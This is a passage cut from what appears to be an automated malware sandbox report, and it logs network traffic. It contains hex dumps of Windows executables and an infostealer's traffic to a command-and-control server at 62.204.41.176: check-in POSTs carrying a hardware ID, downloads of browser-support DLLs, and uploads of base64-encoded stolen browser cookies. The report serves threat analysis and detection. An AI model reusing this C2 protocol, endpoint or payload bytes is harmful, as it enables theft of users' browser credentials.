03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:05 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Oct 2024 07:29:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 05 Sep 2024 14:37:52 GMTETag: "4400-621603c451000"Accept-Ranges: bytesContent-Length: 17408Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e9 30 2c f3 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 3a 00 00 00 08 00 00 00 00 00 00 4a 59 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f7 58 00 00 4f 00 00 00 00 60 00 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 30 58 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 39 00 00 00 20 00 00 00 3a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 dc 05 00 00 00 60 00 00 00 06 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2b 59 00 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 2e 00 00 58 29 00 00 03 00 02 00 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 03 04 58 04 5a 2a 00 1b 30 02 00 3e 00 00 00 01 00 00 11 73 14 00 00 0a 0a 03 6f 15 00 00 0a 0b 2b 14 12 01 28 16 00 00 0a 0c 08 18 5d 2d 07 06 08 6f 17 00 00 0a 12 01 28 18 00 00 0a 2d e3 de 0e 12 01 fe 16 02 00 00 1b 6f 19 00 00 0a dc 06 2a 00 00 01 10 00 00 02 00 0d 00 21 2e 00 0e 00 00 00 00 c2 03 16 31 11 03 18 5d 2d 06 72 01 00 00 70 2a 72 37 00 00 70 2a 03 16 2f 11 03 18 5d 2d 06 72 6b 00 00 70 2a 72 a1 00 00 70 2a 72 d5 00 00 70 2a 26 03 1f 0a 31 02 17 2a 16 2a 00 13 30 03 00 39 00 00 00 02 00 00 11 23 00 00 00 00 00 00 00 00 0a 16 0b 2b 0f 06 03 07 6c 28 1a 00 00 0a 58 0a 07 17 58 0b 07 1b 32 ed 06 23 00 00 00 00 00 00 00 00 34 0a 23 00 00 00 00 00 00 00 00 2a 06 2a 00 00 00 13 30 02 00 2f 00 00 00 03 00 00 11 12 00 28 1b 00 00 0a 7d 17 00 00 04 12 00 15 7d 16 00 00 04 12 00 7c 17 00 00 04 12 00 28 01 00 00 2b 12 00 7c 17 00 00 04 28 1d 00 00 0a 2a 00 13 30 02 00 37 00 00 00 04 00 00 11 12 00 28 1b 00 00 0a 7d 13 00 00 04 12 00 02 7d 14 00
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.176Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKEHost: 62.204.41.176Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 39 39 35 36 36 34 45 39 41 30 39 32 36 35 33 37 36 34 32 32 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 37 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 41 45 42 47 48 44 41 45 43 42 47 44 47 43 41 4b 45 2d 2d 0d 0a Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="hwid"A995664E9A092653764225------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="build"default7_cap------ECBAEBGHDAECBGDGCAKE--
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGDGIIJJECFIDHJJKKFCHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EGDGIIJJECFIDHJJKKFCContent-Disposition: form-data; name="message"browsers------EGDGIIJJECFIDHJJKKFC--
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBAHost: 62.204.41.176Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 4a 4a 4b 46 48 49 4a 4b 4b 46 48 4a 4a 45 43 42 41 2d 2d 0d 0a Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="message"plugins------IJKJJKFHIJKKFHJJECBA--
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEGHJKJKKJDHIDHJKJDHost: 62.204.41.176Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 2d 2d 0d 0a Data Ascii: ------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------AAEGHJKJKKJDHIDHJKJDContent-Disposition: form-data; name="message"fplugins------AAEGHJKJKKJDHIDHJKJD--
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBKKJKJEBFBGCBAAFIHost: 62.204.41.176Content-Length: 5147Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/sqlite3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIEGCAECGCAEBFHDHIEHost: 62.204.41.176Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 45 47 43 41 45 43 47 43 41 45 42 46 48 44 48 49 45 2d 2d 0d 0a Data Ascii: ------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFIEGCAECGCAEBFHDHIEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="file"------JJDGCGHCGHCBFHJJKKJE--
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAAHost: 62.204.41.176Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 33 4a 6c 61 47 70 6c 63 6d 64 79 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 41 2d 2d 0d 0a Data Ascii: ------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="token"811b01e998f070030f518490a9d3304587e58b853b680eff6eae38d6afc2d177dec944b4------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file_name"Z3JlaGplcmdyLnB3ZA==------EGIJKEHCAKFCAKFHDAAAContent-Disposition: form-data; name="file"------EGIJKEHCAKFCAKFHDAAA--
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/freebl3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/mozglue.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/msvcp140.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/nss3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/softokn3.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /db293a2c1b1c70c4/vcruntime140.dll HTTP/1.1Host: 62.204.41.176Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECBFCGIEGCBGCAECGCHost: 62.204.41.176Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAFIJJJKEGIECAKKEHIHost: 62.204.41.176Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 31 31 62 30 31 65 39 39 38 66 30 37 30 30 33 30 66 35 31 38 34 39 30 61 39 64 33 33 30 34 35 38 37 65 35 38 62 38 35 33 62 36 38 30 65 66 66 36 65 61 65 33 38 64 36 61 66 63 32 64 31 37 37 64 65 63 39 34 34 62 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 46 49 4a 4a 4a 4b 45 47 49 45 43 41 4b 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 